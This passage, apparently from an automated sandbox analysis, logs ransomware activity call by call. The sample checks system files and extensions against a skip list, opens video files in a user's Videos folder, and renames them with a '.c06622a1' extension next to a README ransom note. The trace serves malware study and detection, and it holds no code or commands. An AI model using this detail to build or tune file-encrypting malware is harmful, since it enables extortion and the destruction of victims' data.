0x3 [0156.731] _wcsicmp (_Str1="bat", _Str2="mkv") returned -11 [0156.731] wcslen (_String="bat") returned 0x3 [0156.731] _wcsicmp (_Str1="bin", _Str2="mkv") returned -11 [0156.731] wcslen (_String="bin") returned 0x3 [0156.731] _wcsicmp (_Str1="cab", _Str2="mkv") returned -10 [0156.731] wcslen (_String="cab") returned 0x3 [0156.731] _wcsicmp (_Str1="cmd", _Str2="mkv") returned -10 [0156.731] wcslen (_String="cmd") returned 0x3 [0156.731] _wcsicmp (_Str1="com", _Str2="mkv") returned -10 [0156.731] wcslen (_String="com") returned 0x3 [0156.731] _wcsicmp (_Str1="cpl", _Str2="mkv") returned -10 [0156.731] wcslen (_String="cpl") returned 0x3 [0156.731] _wcsicmp (_Str1="cur", _Str2="mkv") returned -10 [0156.731] wcslen (_String="cur") returned 0x3 [0156.731] _wcsicmp (_Str1="deskthemepack", _Str2="mkv") returned -9 [0156.731] wcslen (_String="deskthemepack") returned 0xd [0156.731] _wcsicmp (_Str1="diagcab", _Str2="mkv") returned -9 [0156.731] wcslen (_String="diagcab") returned 0x7 [0156.731] _wcsicmp (_Str1="diagcfg", _Str2="mkv") returned -9 [0156.731] wcslen (_String="diagcfg") returned 0x7 [0156.731] _wcsicmp (_Str1="diagpkg", _Str2="mkv") returned -9 [0156.731] wcslen (_String="diagpkg") returned 0x7 [0156.731] _wcsicmp (_Str1="dll", _Str2="mkv") returned -9 [0156.731] wcslen (_String="dll") returned 0x3 [0156.731] _wcsicmp (_Str1="drv", _Str2="mkv") returned -9 [0156.731] wcslen (_String="drv") returned 0x3 [0156.731] _wcsicmp (_Str1="exe", _Str2="mkv") returned -8 [0156.731] wcslen (_String="exe") returned 0x3 [0156.731] _wcsicmp (_Str1="hlp", _Str2="mkv") returned -5 [0156.731] wcslen (_String="hlp") returned 0x3 [0156.731] _wcsicmp (_Str1="icl", _Str2="mkv") returned -4 [0156.731] wcslen (_String="icl") returned 0x3 [0156.731] _wcsicmp (_Str1="icns", _Str2="mkv") returned -4 [0156.732] wcslen (_String="icns") returned 0x4 [0156.732] _wcsicmp (_Str1="ico", _Str2="mkv") returned -4 [0156.732] wcslen (_String="ico") returned 0x3 [0156.732] _wcsicmp (_Str1="ics", _Str2="mkv") returned -4 [0156.732] wcslen (_String="ics") returned 0x3 [0156.732] _wcsicmp (_Str1="idx", _Str2="mkv") returned -4 [0156.732] wcslen (_String="idx") returned 0x3 [0156.732] _wcsicmp (_Str1="ldf", _Str2="mkv") returned -1 [0156.732] wcslen (_String="ldf") returned 0x3 [0156.732] _wcsicmp (_Str1="lnk", _Str2="mkv") returned -1 [0156.732] wcslen (_String="lnk") returned 0x3 [0156.732] _wcsicmp (_Str1="mod", _Str2="mkv") returned 4 [0156.732] wcslen (_String="mod") returned 0x3 [0156.732] _wcsicmp (_Str1="mpa", _Str2="mkv") returned 5 [0156.732] wcslen (_String="mpa") returned 0x3 [0156.732] _wcsicmp (_Str1="msc", _Str2="mkv") returned 8 [0156.732] wcslen (_String="msc") returned 0x3 [0156.732] _wcsicmp (_Str1="msp", _Str2="mkv") returned 8 [0156.732] wcslen (_String="msp") returned 0x3 [0156.732] _wcsicmp (_Str1="msstyles", _Str2="mkv") returned 8 [0156.732] wcslen (_String="msstyles") returned 0x8 [0156.732] _wcsicmp (_Str1="msu", _Str2="mkv") returned 8 [0156.732] wcslen (_String="msu") returned 0x3 [0156.732] _wcsicmp (_Str1="nls", _Str2="mkv") returned 1 [0156.732] wcslen (_String="nls") returned 0x3 [0156.732] _wcsicmp (_Str1="nomedia", _Str2="mkv") returned 1 [0156.732] wcslen (_String="nomedia") returned 0x7 [0156.732] _wcsicmp (_Str1="ocx", _Str2="mkv") returned 2 [0156.732] wcslen (_String="ocx") returned 0x3 [0156.732] _wcsicmp (_Str1="prf", _Str2="mkv") returned 3 [0156.732] wcslen (_String="prf") returned 0x3 [0156.732] _wcsicmp (_Str1="ps1", _Str2="mkv") returned 3 [0156.733] wcslen (_String="ps1") returned 0x3 [0156.733] _wcsicmp (_Str1="rom", _Str2="mkv") returned 5 [0156.733] wcslen (_String="rom") returned 0x3 [0156.733] _wcsicmp (_Str1="rtp", _Str2="mkv") returned 5 [0156.733] wcslen (_String="rtp") returned 0x3 [0156.733] _wcsicmp (_Str1="scr", _Str2="mkv") returned 6 [0156.733] wcslen (_String="scr") returned 0x3 [0156.733] _wcsicmp (_Str1="shs", _Str2="mkv") returned 6 [0156.733] wcslen (_String="shs") returned 0x3 [0156.733] _wcsicmp (_Str1="spl", _Str2="mkv") returned 6 [0156.733] wcslen (_String="spl") returned 0x3 [0156.733] _wcsicmp (_Str1="sys", _Str2="mkv") returned 6 [0156.733] wcslen (_String="sys") returned 0x3 [0156.733] _wcsicmp (_Str1="theme", _Str2="mkv") returned 7 [0156.733] wcslen (_String="theme") returned 0x5 [0156.733] _wcsicmp (_Str1="themepack", _Str2="mkv") returned 7 [0156.733] wcslen (_String="themepack") returned 0x9 [0156.733] _wcsicmp (_Str1="wpx", _Str2="mkv") returned 10 [0156.733] wcslen (_String="wpx") returned 0x3 [0156.733] _wcsicmp (_Str1="lock", _Str2="mkv") returned -1 [0156.733] wcslen (_String="lock") returned 0x4 [0156.733] _wcsicmp (_Str1="key", _Str2="mkv") returned -2 [0156.733] wcslen (_String="key") returned 0x3 [0156.733] _wcsicmp (_Str1="hta", _Str2="mkv") returned -5 [0156.733] wcslen (_String="hta") returned 0x3 [0156.733] _wcsicmp (_Str1="msi", _Str2="mkv") returned 8 [0156.733] wcslen (_String="msi") returned 0x3 [0156.733] _wcsicmp (_Str1="pdb", _Str2="mkv") returned 3 [0156.733] wcslen (_String="pdb") returned 0x3 [0156.733] _wcsicmp (_Str1="sql", _Str2="mkv") returned 6 [0156.733] wcslen (_String="sql") returned 0x3 [0156.733] _wcsicmp (_Str1="sqlite", _Str2="mkv") returned 6 [0156.733] wcslen (_String="sqlite") returned 0x6 [0156.734] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds")) returned 0x10 [0156.734] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45600c0 [0156.734] wcscpy (in: _Dest=0x45600c0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds" [0156.734] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds") returned 0x48 [0156.734] wcscpy (in: _Dest=0x4560152, _Source="8uXvFATg6zvjO 7.mkv" | out: _Dest="8uXvFATg6zvjO 7.mkv") returned="8uXvFATg6zvjO 7.mkv" [0156.734] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\8uXvFATg6zvjO 7.mkv", dwFileAttributes=0x80) returned 1 [0156.734] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\8uXvFATg6zvjO 7.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\8uxvfatg6zvjo 7.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0156.734] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.734] ReadFile (in: hFile=0x644, lpBuffer=0x3fe3f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe484, lpOverlapped=0x0 | out: lpBuffer=0x3fe3f4*, lpNumberOfBytesRead=0x3fe484*=0x90, lpOverlapped=0x0) returned 1 [0156.735] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe3f4, Length=0x80) returned 0x7a9e0e42 [0156.735] RtlComputeCrc32 (PartialCrc=0xe42, Buffer=0x3fe3f4, Length=0x80) returned 0x7b6e9e93 [0156.735] RtlComputeCrc32 (PartialCrc=0x9e93, Buffer=0x3fe3f4, Length=0x80) returned 0x556630d7 [0156.735] RtlComputeCrc32 (PartialCrc=0x30d7, Buffer=0x3fe3f4, Length=0x80) returned 0xee8f47a4 [0156.735] RtlComputeCrc32 (PartialCrc=0x47a4, Buffer=0x3fe3f4, Length=0x80) returned 0xabf8e6fa [0156.735] CloseHandle (hObject=0x644) returned 1 [0156.735] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45700c8 [0156.735] wcscpy (in: _Dest=0x45700c8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\8uXvFATg6zvjO 7.mkv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\8uXvFATg6zvjO 7.mkv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\8uXvFATg6zvjO 7.mkv" [0156.735] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\8uXvFATg6zvjO 7.mkv") returned 0x5c [0156.735] wcscpy (in: _Dest=0x4570180, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.735] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\8uXvFATg6zvjO 7.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\8uxvfatg6zvjo 7.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\8uXvFATg6zvjO 7.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\8uxvfatg6zvjo 7.mkv.c06622a1"), dwFlags=0x8) returned 1 [0156.737] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\8uXvFATg6zvjO 7.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\8uxvfatg6zvjo 7.mkv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x644 [0156.737] CreateIoCompletionPort (FileHandle=0x644, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0156.737] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4af0020 [0156.743] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x69a95619 [0156.743] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x11378000 [0156.743] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5fc3939b [0156.743] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xe29799c [0156.743] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x564bf8af [0156.743] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x640c19f2 [0156.743] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3084b561 [0156.743] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x49c62605 [0156.746] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4af0094, Length=0x80) returned 0x838efcb4 [0156.746] RtlComputeCrc32 (PartialCrc=0xfcb4, Buffer=0x4af0094, Length=0x80) returned 0x177a86af [0156.747] RtlComputeCrc32 (PartialCrc=0x86af, Buffer=0x4af0094, Length=0x80) returned 0xade8f38a [0156.747] RtlComputeCrc32 (PartialCrc=0xf38a, Buffer=0x4af0094, Length=0x80) returned 0x5e562cde [0156.747] RtlComputeCrc32 (PartialCrc=0x2cde, Buffer=0x4af0094, Length=0x80) returned 0xdf6cf1fe [0156.747] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4af0020) returned 1 [0156.747] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45600c0) returned 1 [0156.747] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45700c8) returned 1 [0156.747] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e8c0b60, ftCreationTime.dwHighDateTime=0x1d5e0b7, ftLastAccessTime.dwLowDateTime=0x8544fee0, ftLastAccessTime.dwHighDateTime=0x1d5e7a1, ftLastWriteTime.dwLowDateTime=0x8544fee0, ftLastWriteTime.dwHighDateTime=0x1d5e7a1, nFileSizeHigh=0x0, nFileSizeLow=0xa023, dwReserved0=0x0, dwReserved1=0x0, cFileName="QK5W0jsW Mk76.mp4", cAlternateFileName="QK5W0J~1.MP4")) returned 1 [0156.747] _wcsicmp (_Str1="QK5W0jsW Mk76.mp4", _Str2="README.c06622a1.TXT") returned -1 [0156.747] wcsstr (_Str="QK5W0jsW Mk76.mp4", _SubStr="README") returned 0x0 [0156.747] _wcsicmp (_Str1="autorun.inf", _Str2="QK5W0jsW Mk76.mp4") returned -16 [0156.747] wcslen (_String="autorun.inf") returned 0xb [0156.747] _wcsicmp (_Str1="boot.ini", _Str2="QK5W0jsW Mk76.mp4") returned -15 [0156.747] wcslen (_String="boot.ini") returned 0x8 [0156.747] _wcsicmp (_Str1="bootfont.bin", _Str2="QK5W0jsW Mk76.mp4") returned -15 [0156.747] wcslen (_String="bootfont.bin") returned 0xc [0156.747] _wcsicmp (_Str1="bootsect.bak", _Str2="QK5W0jsW Mk76.mp4") returned -15 [0156.747] wcslen (_String="bootsect.bak") returned 0xc [0156.747] _wcsicmp (_Str1="desktop.ini", _Str2="QK5W0jsW Mk76.mp4") returned -13 [0156.747] wcslen (_String="desktop.ini") returned 0xb [0156.747] _wcsicmp (_Str1="iconcache.db", _Str2="QK5W0jsW Mk76.mp4") returned -8 [0156.747] wcslen (_String="iconcache.db") returned 0xc [0156.747] _wcsicmp (_Str1="ntldr", _Str2="QK5W0jsW Mk76.mp4") returned -3 [0156.747] wcslen (_String="ntldr") returned 0x5 [0156.747] _wcsicmp (_Str1="ntuser.dat", _Str2="QK5W0jsW Mk76.mp4") returned -3 [0156.748] wcslen (_String="ntuser.dat") returned 0xa [0156.748] _wcsicmp (_Str1="ntuser.dat.log", _Str2="QK5W0jsW Mk76.mp4") returned -3 [0156.748] wcslen (_String="ntuser.dat.log") returned 0xe [0156.748] _wcsicmp (_Str1="ntuser.ini", _Str2="QK5W0jsW Mk76.mp4") returned -3 [0156.748] wcslen (_String="ntuser.ini") returned 0xa [0156.748] _wcsicmp (_Str1="thumbs.db", _Str2="QK5W0jsW Mk76.mp4") returned 3 [0156.748] wcslen (_String="thumbs.db") returned 0x9 [0156.748] _wcsicmp (_Str1="386", _Str2="mp4") returned -58 [0156.748] wcslen (_String="386") returned 0x3 [0156.748] _wcsicmp (_Str1="adv", _Str2="mp4") returned -12 [0156.748] wcslen (_String="adv") returned 0x3 [0156.748] _wcsicmp (_Str1="ani", _Str2="mp4") returned -12 [0156.748] wcslen (_String="ani") returned 0x3 [0156.748] _wcsicmp (_Str1="bat", _Str2="mp4") returned -11 [0156.748] wcslen (_String="bat") returned 0x3 [0156.748] _wcsicmp (_Str1="bin", _Str2="mp4") returned -11 [0156.748] wcslen (_String="bin") returned 0x3 [0156.748] _wcsicmp (_Str1="cab", _Str2="mp4") returned -10 [0156.748] wcslen (_String="cab") returned 0x3 [0156.748] _wcsicmp (_Str1="cmd", _Str2="mp4") returned -10 [0156.748] wcslen (_String="cmd") returned 0x3 [0156.748] _wcsicmp (_Str1="com", _Str2="mp4") returned -10 [0156.748] wcslen (_String="com") returned 0x3 [0156.748] _wcsicmp (_Str1="cpl", _Str2="mp4") returned -10 [0156.748] wcslen (_String="cpl") returned 0x3 [0156.748] _wcsicmp (_Str1="cur", _Str2="mp4") returned -10 [0156.748] wcslen (_String="cur") returned 0x3 [0156.748] _wcsicmp (_Str1="deskthemepack", _Str2="mp4") returned -9 [0156.749] wcslen (_String="deskthemepack") returned 0xd [0156.749] _wcsicmp (_Str1="diagcab", _Str2="mp4") returned -9 [0156.749] wcslen (_String="diagcab") returned 0x7 [0156.749] _wcsicmp (_Str1="diagcfg", _Str2="mp4") returned -9 [0156.749] wcslen (_String="diagcfg") returned 0x7 [0156.749] _wcsicmp (_Str1="diagpkg", _Str2="mp4") returned -9 [0156.749] wcslen (_String="diagpkg") returned 0x7 [0156.749] _wcsicmp (_Str1="dll", _Str2="mp4") returned -9 [0156.749] wcslen (_String="dll") returned 0x3 [0156.749] _wcsicmp (_Str1="drv", _Str2="mp4") returned -9 [0156.749] wcslen (_String="drv") returned 0x3 [0156.749] _wcsicmp (_Str1="exe", _Str2="mp4") returned -8 [0156.749] wcslen (_String="exe") returned 0x3 [0156.749] _wcsicmp (_Str1="hlp", _Str2="mp4") returned -5 [0156.749] wcslen (_String="hlp") returned 0x3 [0156.749] _wcsicmp (_Str1="icl", _Str2="mp4") returned -4 [0156.749] wcslen (_String="icl") returned 0x3 [0156.749] _wcsicmp (_Str1="icns", _Str2="mp4") returned -4 [0156.749] wcslen (_String="icns") returned 0x4 [0156.749] _wcsicmp (_Str1="ico", _Str2="mp4") returned -4 [0156.749] wcslen (_String="ico") returned 0x3 [0156.749] _wcsicmp (_Str1="ics", _Str2="mp4") returned -4 [0156.749] wcslen (_String="ics") returned 0x3 [0156.749] _wcsicmp (_Str1="idx", _Str2="mp4") returned -4 [0156.749] wcslen (_String="idx") returned 0x3 [0156.749] _wcsicmp (_Str1="ldf", _Str2="mp4") returned -1 [0156.749] wcslen (_String="ldf") returned 0x3 [0156.749] _wcsicmp (_Str1="lnk", _Str2="mp4") returned -1 [0156.749] wcslen (_String="lnk") returned 0x3 [0156.749] _wcsicmp (_Str1="mod", _Str2="mp4") returned -1 [0156.749] wcslen (_String="mod") returned 0x3 [0156.749] _wcsicmp (_Str1="mpa", _Str2="mp4") returned 45 [0156.749] wcslen (_String="mpa") returned 0x3 [0156.749] _wcsicmp (_Str1="msc", _Str2="mp4") returned 3 [0156.750] wcslen (_String="msc") returned 0x3 [0156.750] _wcsicmp (_Str1="msp", _Str2="mp4") returned 3 [0156.750] wcslen (_String="msp") returned 0x3 [0156.750] _wcsicmp (_Str1="msstyles", _Str2="mp4") returned 3 [0156.750] wcslen (_String="msstyles") returned 0x8 [0156.750] _wcsicmp (_Str1="msu", _Str2="mp4") returned 3 [0156.750] wcslen (_String="msu") returned 0x3 [0156.750] _wcsicmp (_Str1="nls", _Str2="mp4") returned 1 [0156.750] wcslen (_String="nls") returned 0x3 [0156.750] _wcsicmp (_Str1="nomedia", _Str2="mp4") returned 1 [0156.750] wcslen (_String="nomedia") returned 0x7 [0156.750] _wcsicmp (_Str1="ocx", _Str2="mp4") returned 2 [0156.750] wcslen (_String="ocx") returned 0x3 [0156.750] _wcsicmp (_Str1="prf", _Str2="mp4") returned 3 [0156.750] wcslen (_String="prf") returned 0x3 [0156.750] _wcsicmp (_Str1="ps1", _Str2="mp4") returned 3 [0156.750] wcslen (_String="ps1") returned 0x3 [0156.750] _wcsicmp (_Str1="rom", _Str2="mp4") returned 5 [0156.750] wcslen (_String="rom") returned 0x3 [0156.750] _wcsicmp (_Str1="rtp", _Str2="mp4") returned 5 [0156.750] wcslen (_String="rtp") returned 0x3 [0156.750] _wcsicmp (_Str1="scr", _Str2="mp4") returned 6 [0156.750] wcslen (_String="scr") returned 0x3 [0156.750] _wcsicmp (_Str1="shs", _Str2="mp4") returned 6 [0156.750] wcslen (_String="shs") returned 0x3 [0156.750] _wcsicmp (_Str1="spl", _Str2="mp4") returned 6 [0156.750] wcslen (_String="spl") returned 0x3 [0156.750] _wcsicmp (_Str1="sys", _Str2="mp4") returned 6 [0156.750] wcslen (_String="sys") returned 0x3 [0156.750] _wcsicmp (_Str1="theme", _Str2="mp4") returned 7 [0156.750] wcslen (_String="theme") returned 0x5 [0156.750] _wcsicmp (_Str1="themepack", _Str2="mp4") returned 7 [0156.750] wcslen (_String="themepack") returned 0x9 [0156.750] _wcsicmp (_Str1="wpx", _Str2="mp4") returned 10 [0156.750] wcslen (_String="wpx") returned 0x3 [0156.751] _wcsicmp (_Str1="lock", _Str2="mp4") returned -1 [0156.751] wcslen (_String="lock") returned 0x4 [0156.751] _wcsicmp (_Str1="key", _Str2="mp4") returned -2 [0156.751] wcslen (_String="key") returned 0x3 [0156.751] _wcsicmp (_Str1="hta", _Str2="mp4") returned -5 [0156.751] wcslen (_String="hta") returned 0x3 [0156.751] _wcsicmp (_Str1="msi", _Str2="mp4") returned 3 [0156.751] wcslen (_String="msi") returned 0x3 [0156.751] _wcsicmp (_Str1="pdb", _Str2="mp4") returned 3 [0156.751] wcslen (_String="pdb") returned 0x3 [0156.751] _wcsicmp (_Str1="sql", _Str2="mp4") returned 6 [0156.751] wcslen (_String="sql") returned 0x3 [0156.751] _wcsicmp (_Str1="sqlite", _Str2="mp4") returned 6 [0156.751] wcslen (_String="sqlite") returned 0x6 [0156.751] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds")) returned 0x10 [0156.751] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45600c0 [0156.751] wcscpy (in: _Dest=0x45600c0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds" [0156.751] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds") returned 0x48 [0156.751] wcscpy (in: _Dest=0x4560152, _Source="QK5W0jsW Mk76.mp4" | out: _Dest="QK5W0jsW Mk76.mp4") returned="QK5W0jsW Mk76.mp4" [0156.751] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\QK5W0jsW Mk76.mp4", dwFileAttributes=0x80) returned 1 [0156.752] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\QK5W0jsW Mk76.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\qk5w0jsw mk76.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x648 [0156.752] SetFilePointerEx (in: hFile=0x648, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.752] ReadFile (in: hFile=0x648, lpBuffer=0x3fe3f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe484, lpOverlapped=0x0 | out: lpBuffer=0x3fe3f4*, lpNumberOfBytesRead=0x3fe484*=0x90, lpOverlapped=0x0) returned 1 [0156.752] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe3f4, Length=0x80) returned 0x57a95793 [0156.753] RtlComputeCrc32 (PartialCrc=0x5793, Buffer=0x3fe3f4, Length=0x80) returned 0xbcb16c7b [0156.753] RtlComputeCrc32 (PartialCrc=0x6c7b, Buffer=0x3fe3f4, Length=0x80) returned 0x2073837f [0156.753] RtlComputeCrc32 (PartialCrc=0x837f, Buffer=0x3fe3f4, Length=0x80) returned 0xa785e0eb [0156.753] RtlComputeCrc32 (PartialCrc=0xe0eb, Buffer=0x3fe3f4, Length=0x80) returned 0x7c618ef9 [0156.753] CloseHandle (hObject=0x648) returned 1 [0156.753] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45700c8 [0156.753] wcscpy (in: _Dest=0x45700c8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\QK5W0jsW Mk76.mp4" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\QK5W0jsW Mk76.mp4") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\QK5W0jsW Mk76.mp4" [0156.753] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\QK5W0jsW Mk76.mp4") returned 0x5a [0156.753] wcscpy (in: _Dest=0x457017c, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.753] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\QK5W0jsW Mk76.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\qk5w0jsw mk76.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\QK5W0jsW Mk76.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\qk5w0jsw mk76.mp4.c06622a1"), dwFlags=0x8) returned 1 [0156.755] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\QK5W0jsW Mk76.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\qk5w0jsw mk76.mp4.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x648 [0156.755] CreateIoCompletionPort (FileHandle=0x648, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0156.755] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4b80020 [0156.761] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x44d4b6da [0156.761] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1ad21aed [0156.761] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7c3fe8ec [0156.761] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2d82d61b [0156.761] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x53051279 [0156.761] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x77992e [0156.761] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6cc5ae62 [0156.761] RtlRandomEx (in: Seed=0xf51018 | out: 